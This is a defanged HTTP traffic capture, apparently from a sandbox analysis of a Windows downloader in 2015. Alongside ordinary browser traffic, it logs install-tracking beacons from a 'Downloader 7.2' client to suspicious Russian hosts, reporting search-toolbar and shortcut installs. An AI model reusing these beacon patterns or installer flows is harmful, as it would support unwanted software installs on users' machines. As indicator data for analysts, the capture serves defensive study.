v..M.d.v..2.......LZeI9..)q(6.............0..0...U...........0...U....
..67.....)...u/..n.%.q0L..U. .E0C0A.. .....2._0402.. ........&hXXps://
VVV.globalsign.com/repository/0...U....0.0...U.%..0... .......0...U.#.
.0...`{f.E....P/}..4....K0... .....0......0...*.H..............BFAX...
..8..)..h..*.V.eY.D|0-..H.;....9.....i. m./fi.......g2..2g.....!...&..
.....7AD:MQ.y.....X[...$.....y.S.{.....b'.(..Z........F..'.....K.<.
.......N.li_.4i.%z-..R\.>...'..l'....#......i.Ls.^Y...55.J....E...N
..H.M....Kz.KD8.@.RFfm...$..p]_..jE..2.j!..S..<<< skipped >>>

GET /res/servicefiles/ca-revocation-lists/desktop/20140806-1.json HTTP/1.1

Host: get.geo.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:30 GMT

Content-Type: application/octet-stream

Content-Length: 261

Last-Modified: Wed, 06 Aug 2014 12:02:32 GMT

Connection: keep-alive

Accept-Ranges: bytes

..{."Version":0,."ContentType":"CRLSet",."Sequence":1,."NumParents":0,
."DeltaFrom":0,."BlockedSPKIs":["5uE2yGFU8yw SfR8/Gszj/LcYc4U/HWJs7VqF
FATJwE=", " gC xz3Zl5XfEWLHiZhwBMJsv5CvTbRC9mIg3kE1Ssk=", "m4qT3szPuvz
00E00QhKPs1IYz Q3o9jQMoyZ JCJ5FA="],."NotAfter":0.}HTTP/1.1 200 OK..Se
rver: nginx..Date: Mon, 23 Feb 2015 09:32:30 GMT..Content-Type: applic
ation/octet-stream..Content-Length: 261..Last-Modified: Wed, 06 Aug 20
14 12:02:32 GMT..Connection: keep-alive..Accept-Ranges: bytes....{."Ve
rsion":0,."ContentType":"CRLSet",."Sequence":1,."NumParents":0,."Delta
From":0,."BlockedSPKIs":["5uE2yGFU8yw SfR8/Gszj/LcYc4U/HWJs7VqFFATJwE=
", " gC xz3Zl5XfEWLHiZhwBMJsv5CvTbRC9mIg3kE1Ssk=", "m4qT3szPuvz00E00Qh
KPs1IYz Q3o9jQMoyZ JCJ5FA="],."NotAfter":0.}..

GET /?clid=9403 HTTP/1.1

Host: VVV.yandex.ua

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Found

Server: nginx

Date: Mon, 23 Feb 2015 09:35:32 GMT

Content-Length: 0

Connection: close

Cache-Control: no-cache,no-store,max-age=0,must-revalidate

Location: hXXps://pass.yandex.ua/?retpath=http://VVV.yandex.ua/?clid=9403

Expires: Mon, 23 Feb 2015 09:35:32 GMT

Last-Modified: Mon, 23 Feb 2015 09:35:32 GMT

P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"

Set-Cookie: Cookie_check=CheckCookieCheckCookie; Domain=.yandex.ua; Path=/

Set-Cookie: yandexuid=7651846481424684132; Expires=Thu, 20-Feb-2025 09:35:32 GMT; Domain=.yandex.ua; Path=/

X-XRDS-Location: hXXp://openid.yandex.ru/server_xrds/

GET /speeddials/partner/megogo_net_ua HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/megogo_net_ua/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2598682958

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/yandex_maps_ua/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma



...i..~.L.....%.F|=L..\..!k.S...N(.C|.R.)..fO.6.3......K..L...xS....BU
UP..=...`._u.....64....i...#..#.zM.r?......../............:...u....2n.
R..R.>.....,......m......T..].kel....?...[&...Z.{.[_o/.S.#.4.WN..sC
.....}...[z[.[.zh(....6).#....E..P.IG.....z.........~.1....%l......  i
...F!..gL.N........a.c.8b..e..r.,.......L.{..F..K....4...8..y>.,Z.1
t(2?...a.L..(..?..Ei...9.0.....S&N.Pq.Xdf&5.:sm....Y.(.~.,9.(..p4.....
..v.9~|...7.Vo.]/.F=.........A..0..1.#.o..8r."...{....z.f.......E..F..
._...I..Fs.}w..1.....S.i.../......n --.|UA.#.1...RmcKK).(.)...)eY.KJ=j
...........-.....U.......C.M.d.k.H..@.eC.d..0.I.f_...>.......zk.q..
e{."-/.7..K@.....!Y).|.y..T.....e......4.........3...1Z.f....(L.k.p.}.
.....k.$|..........)X.w../.._.....7.N._'c...(..Q'.,#..F.";m.QT.....]..
i.P....Xb......:y2~..kq..S^.....1.Y...#5..z.=.........s`. n.......e...
..H..%...a;......?........_....O>....`.........s7v...c..o&7..YJ....
.9.....q.0A. ...sX[......Iq.q.u...r.....>..htk....*.&.../...>...
.....M.D.V..0..mB....K.Lk...u.?.gB*t.D..f.a....z......o..7.........4..
5N;.......3gZ..Q,!@aZ... -..!U..K..%.....9....gO...s......z<...H<
;*../p.$....VF..0...=.X@....@f..0J..4J..$`.......A.F.P.F...., @aZ..!H.
(...(1.....(L. 3...%@a.%F{.....i.d. ...(L..hO....0-...$`...i...I......
.......0...=.X@..4.......[..b.>..H..,Daa!.....Z...s..p...l.;.....l.
.{..b..E..`m..nE-f.......J.#...O....[V..)..u>.3o..).......`y....R.&
lt;...ty.A<{W.&....G.....?..g.F....q......?....1..z...[..=.!CGa.ey.
.>....hl.9Zw.Q..e......A......q.__.u.....aY.K....$...@d3.@.R.."<<< skipped >>>

GET /previews/images/slando/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "766c7b-29a3-50ecea1134600"

Content-Type: image/png

Content-Length: 10659

Date: Mon, 23 Feb 2015 09:35:32 GMT

X-Varnish: 2724644877 2724619551

Age: 72

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 13
.PNG........IHDR.............6.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC (Windows)" xmpMM:InstanceID="xmp.iid:DCAF871C431811E49F44C47BF
B158B70" xmpMM:DocumentID="xmp.did:DCAF871D431811E49F44C47BFB158B70"&g
t; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DCAF871A431811E49F4
4C47BFB158B70" stRef:documentID="xmp.did:DCAF871B431811E49F44C47BFB158
B70"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
 <?xpacket end="r"?>. "...&.IDATx..].XTG....t.E.M@:"...(v.k,.|..
..O.L..h.........c....(...... ....;........".-.......3.;\....g.......r
.).E..?(-.,/..(.,/.X]..............l..{.7.0.T.%.k..Y.x..V6v........N..
.n...iU..JRvp.....y.nN...9wog..Uj.`T*..../`.o@.O`..Ia\.5is..J.x..K.i).
3....U.^.I..,M.x.\..F......t. .T...&.....7.74w.e.....d..1%lJ.......X..
}.......K..^<......u.Gs...{xy;..B..=......................e.....fgU
.6.X...u...Y1.&GD...)#....$5)...#'..l.........^HxD.../.?.K......9?.N..
...WSS.....*.X..[.l....Q....I..J......w...cMc[...2..fL.9/6rZ...'......
Qr.09.........i.o.x.k..qU.:...\..G.@.p...1S'..(.?N....?{.b.......I<<< skipped >>>

GET /touch_install?name=go_search_taskbar.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=72ff008b16006154dc070d945474c1849a84d99b5f42bcb48c4f60d1bf607a46&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:36:12 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:36:12 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04fa2A0Qe1fPKSEf6yq4ba1fE53K6kzkZQUDHmh-04iG6xw-iJiLPxqLHx1m00,bs.mail.ru,,1961059298 HTTP/1.1

Host: bs.yandex.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: yandexuid=2579112161391436322; fuid01=52efa225559a4080.FnXUl7kQ2UnsKWXsrNOZvuy1gjQHCg1JR4X5KG6JbjNm8ywHYDR3v3sXwUhoGRccAr84V3sKYyTKQYDhyBaE3anqP-L8i-wbGtlHwnaA7ADOXPPij0wwfOF6mBYd809f


HTTP/1.1 302 Found

Date: Mon, 23 Feb 2015 09:35:35 GMT

Server: Phantom/0.0.0

P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"

Last-Modified: Mon, 23 Feb 2015 09:35:35 GMT

Expires: Mon, 23 Feb 2015 09:35:35 GMT

Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0

Pragma: no-cache

Location: hXXp://bs.mail.ru/count/U_4amYGH3by40X00gP800OwtQLST1MnPYBhJ0H04fa2A0Qe1fPKSEf6yq4ba1fE53K6kzkZQUDHmh-04iG6xw-iJiLPxqLHx1m00,bs.mail.ru,2579112161391436322,3896980131

Content-Length: 0

HTTP/1.1 302 Found..Date: Mon, 23 Feb 2015 09:35:35 GMT..Server: Phant
om/0.0.0..P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"..Last-Modified: Mon,
 23 Feb 2015 09:35:35 GMT..Expires: Mon, 23 Feb 2015 09:35:35 GMT..Cac
he-Control: private, no-cache, no-store, must-revalidate, max-age=0..P
ragma: no-cache..Location: hXXp://bs.mail.ru/count/U_4amYGH3by40X00gP8
00OwtQLST1MnPYBhJ0H04fa2A0Qe1fPKSEf6yq4ba1fE53K6kzkZQUDHmh-04iG6xw-iJi
LPxqLHx1m00,bs.mail.ru,2579112161391436322,3896980131..Content-Length:
 0..

GET /favicon/wikipedia.ico HTTP/1.1

Host: bits.wikimedia.org

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: Apache

X-Powered-By: HHVM/3.3.0-static

Last-Modified: Tue, 30 Sep 2014 15:31:27 GMT

ETag: "aae-5044a13a191c0"

Content-Type: image/vnd.microsoft.icon

X-Varnish: 2892266913 2892242068, 2669517460 2669342637

Via: 1.1 varnish, 1.1 varnish

Content-Length: 2734

Accept-Ranges: bytes

Date: Mon, 23 Feb 2015 09:31:30 GMT

Age: 66

Connection: keep-alive

X-Cache: cp1069 hit (1186), cp3022 hit (9360)

......00......h...6...  ......................(.......(...0...`.......
................................000.GGG.XXX.ggg.vvv...................
......................................................................
......................................................................
......................................................................
...............[.................n......................0.............
........................................O.-.................=.........
...........o.x......".................2....-p....................@...&
gt;......................................>.........................
.@..<..@....................n...^..................................
........................@.^...........................O...............
..................................A................>.......N.......
......?.....`.~......A............../.........n.......................
 ........-.........,...........@.N...`.n.......................~......
...=.... ...{.P.....0....P..|..2#DD2&.#DD2 .#DC&.#DC$.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET /download/get/?id=38020&autoupdate=1&ni=1&stream=stable&utm_source=turbo&utm_campaign=turbo_newNI&utm_medium=pb&niuid=dd1a4d0e-56b7-42dc-b0d5-e49130159c6f HTTP/1.1

User-Agent: Opera NetInstaller/27.0.1689.69

Host: VVV.opera.com

Cache-Control: no-cache


HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1

Date: Mon, 23 Feb 2015 09:33:55 GMT

Location: hXXp://operasoftware.pc.cdn.bitgravity.com/pub/opera/desktop/27.0.1689.69/win/Opera_27.0.1689.69_Setup.exe

Server: nginx

Vary: Accept-Encoding

Content-Length: 353

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://operasoftware.pc.cdn.bitgravity.com/pub/opera/desktop/27.
0.1689.69/win/Opera_27.0.1689.69_Setup.exe">here</a>.</p&g
t;.<hr>.<address>Apache Server at VVV.opera.com Port 80<
;/address>.</body></html>.HTTP/1.1 302 Found..Content-T
ype: text/html; charset=iso-8859-1..Date: Mon, 23 Feb 2015 09:33:55 GM
T..Location: hXXp://operasoftware.pc.cdn.bitgravity.com/pub/opera/desk
top/27.0.1689.69/win/Opera_27.0.1689.69_Setup.exe..Server: nginx..Vary
: Accept-Encoding..Content-Length: 353..Connection: keep-alive..<!D
OCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><hea
d>.<title>302 Found</title>.</head><body>.&
lt;h1>Found</h1>.<p>The document has moved <a href="
hXXp://operasoftware.pc.cdn.bitgravity.com/pub/opera/desktop/27.0.1689
.69/win/Opera_27.0.1689.69_Setup.exe">here</a>.</p>.<
;hr>.<address>Apache Server at VVV.opera.com Port 80</addr
ess>.</body></html>...

GET /gosearch3.ico HTTP/1.1

Host: illespi.dom-upload.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:34:20 GMT

Content-Type: image/x-icon

Content-Length: 32038

Last-Modified: Wed, 03 Dec 2014 15:19:53 GMT

Connection: keep-alive

ETag: "547f2a19-7d26"

Accept-Ranges: bytes

............ .h...F...  .... .........00.... ..%..V...@@.... .(B...:..
(....... ..... .......................................................
.......................................o...s...s...s...s...s...t...t..
.t...t...t...t...s...m...........w...v...w...y...z...|...~............
..2.......Y....t...........x...w...z...}......................4.......
.........w...........z...y...~......3...a...V.......6.................
...y...........|...{...............................................|..
............................k...}............................~........
..M...............>...7...2...B...................................P
...........{...f...f...f...f...........|...'...................S......
.....r...f...f...f...f...............f...a...?...........V............
...f...f...f...h...........~...f...f...Q...........Y...y..............
.w...................f...f...f...T...........\...f....................
...........r...f...f...f...X...........^...f...f...x..................
.i...f...f...f...f...[...........Y...b...b...b...b...b...b...b...b...b
...b...b...b...W......................................................
......................................................................
...........(... ...@..... ............................................
......................................................................
......................................................................
......................................................................
....................................M.8.m...p...p...p...p...p...p.

<<< skipped >>>

HEAD /software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&guid=5838c925-e41e-4c3d-96da-ee64daaff3a6&sig=fc3c1ccad0768cd1c10bc55a9d24d4b0&ovr=0&file_id=32888998&did=1497824015&ext_partner_id=&go_search_desktop=1&ext_partner_id= HTTP/1.1

Host: forces.vseturbo.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:34:20 GMT

Content-Type: text/html

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:34:20 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQCJu4vX6KBCDTazDOA5oCs6Cf2BAQUmeRAX2sUXj4F2d3TY1T8Yrj3AKwCEQC0s+PTXrSCm7jlM0aIFWoS HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.comodoca.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:41 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Sun, 22 Feb 2015 04:43:40 GMT

Expires: Thu, 26 Feb 2015 04:43:40 GMT

ETag: 132047FFBC0281329A0C083839E00356721B063E

Cache-Control: max-age=241078,public,no-transform,must-revalidate

X-OCSP-Reponder-ID: h6edcaocsp7

Content-Length: 472

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0........@_k.^>....cT.b......2015
0222044340Z0t0r0J0... .........&./_...4..3.....'......@_k.^>....cT.
b...........^.....3F..j.....20150222044340Z....20150226044340Z0...*.H.
............N....G...(f...29..<0.8j...".&.CK..`.......l..../..&j...
0.....k.....I..Z...p..y..S>.g...m.bQ....!i._TO..?.....Dg....y(.....
A.w...D...`....f. .....o`...N/....m.oA..B..C ..NC...!{G.%..-8].J...l..
....w,l...H..6......"..G.....-..iJ...v.k.....&S^....*.t..pB...W}..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545089, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545089, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

GET /hit?r;s1716*901*24;uhttp://go.mail.ru/?osd=1;0.6857750520575792 HTTP/1.1

Host: counter.yadro.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 302 Moved Temporarily

Date: Mon, 23 Feb 2015 09:35:34 GMT

Server: 0W/0.8c

Content-Type: text/html

Location: hXXp://counter.yadro.ru/hit?q;r;s1716*901*24;uhttp://go.mail.ru/?osd=1;0.6857750520575792

Content-Length: 32

Expires: Sat, 22 Feb 2014 21:00:00 GMT

Pragma: no-cache

Cache-control: no-cache

P3P: policyref="/w3c/p3p.xml", CP="UNI"

Set-Cookie: FTID=1KwlHc3QBqbJ1KwlHc; path=/; expires=Mon, 22 Feb 2016 21:00:00 GMT; domain=.yadro.ru
<html><body>Moved</body></html>.HTTP/1.1 302 M
oved Temporarily..Date: Mon, 23 Feb 2015 09:35:34 GMT..Server: 0W/0.8c
..Content-Type: text/html..Location: hXXp://counter.yadro.ru/hit?q;r;s
1716*901*24;uhttp://go.mail.ru/?osd=1;0.6857750520575792..Conten
t-Length: 32..Expires: Sat, 22 Feb 2014 21:00:00 GMT..Pragma: no-cache
..Cache-control: no-cache..P3P: policyref="/w3c/p3p.xml", CP="UNI"..Se
t-Cookie: FTID=1KwlHc3QBqbJ1KwlHc; path=/; expires=Mon, 22 Feb 2016 21
:00:00 GMT; domain=.yadro.ru..<html><body>Moved</body&g
t;</html>.....


GET /hit?q;r;s1716*901*24;uhttp://go.mail.ru/?osd=1;0.6857750520575792 HTTP/1.1

Host: counter.yadro.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: FTID=1KwlHc3QBqbJ1KwlHc


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:35 GMT

Server: 0W/0.8c

Connection: Close

Content-Type: image/gif

Content-Length: 43

Expires: Sat, 22 Feb 2014 21:00:00 GMT

Pragma: no-cache

Cache-control: no-cache

P3P: policyref="/w3c/p3p.xml", CP="UNI"

Set-Cookie: VID=23U7Gg1AzTrJ1KwlHd; path=/; expires=Mon, 22 Feb 2016 21:00:00 GMT; domain=.yadro.ru
GIF89a.............!.......,...........D..;..

HEAD /?prod=shortcutmaker&version=1.0.0.113&action=set_shortcut_success&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=7c01ff2c1ae698a011886c728c9d1fe1&guid=5838C925E41E4C3D96DAEE64DAAFF3A6 HTTP/1.1

Host: gstinfo.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:34:20 GMT

Content-Type: : text/plain

Content-Length: 3

Connection: keep-alive

GET /delay?time=0&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:31:13 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:31:13 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET /static/web/doodles/loader.css?5698926c HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: text/css,*/*;q=0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:33 GMT

Content-Type: text/css

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:33 GMT

Cache-Control: max-age=864000

Access-Control-Allow-Origin: *

Content-Encoding: gzip
203...............N.0...%......(.@T..^......2..vi;A..n..C.F..v...}.w..
v..Q.(O...pp..VC.h.....D....&z...|kG B..Fwwnh&r....|.#%X...h.#0.......
_.......p:.. 0..L...p0..[..c....r.....p..1..-.'.......M.FZ^0..[.k....B
..E..u*E...F/../...........P.......2.9.pY{.......)........S...Dk.;5...
....4...D..8Y.....\{...?B..n..%...(...Q....b....w.=.v...NzQ..c...?j...
VA.j..G.....,.^.2.#t.C<;........R..(.4....._u?......q{.a,..h....XK.
.R......q}..nm.9..0.K6......L..{u? .......MY._..g...qA.z3..0.uV.......
./^..vq....y ?.._n..........p......0......


GET /static/web/js/portal_header/portal_header_0.1.33.js?274e8161 HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:33 GMT

Content-Type: application/x-javascript

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Transfer-Encoding: chunked

Connection: keep-alive

